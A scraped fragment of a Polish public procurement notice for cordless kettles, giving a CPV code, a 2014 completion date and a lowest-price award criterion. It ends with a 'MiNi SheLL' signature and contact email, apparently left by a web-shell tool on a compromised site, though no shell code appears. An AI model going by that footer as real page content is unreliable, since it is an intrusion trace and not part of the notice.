10	Czajnik bezprzewodowy	8 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 25.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com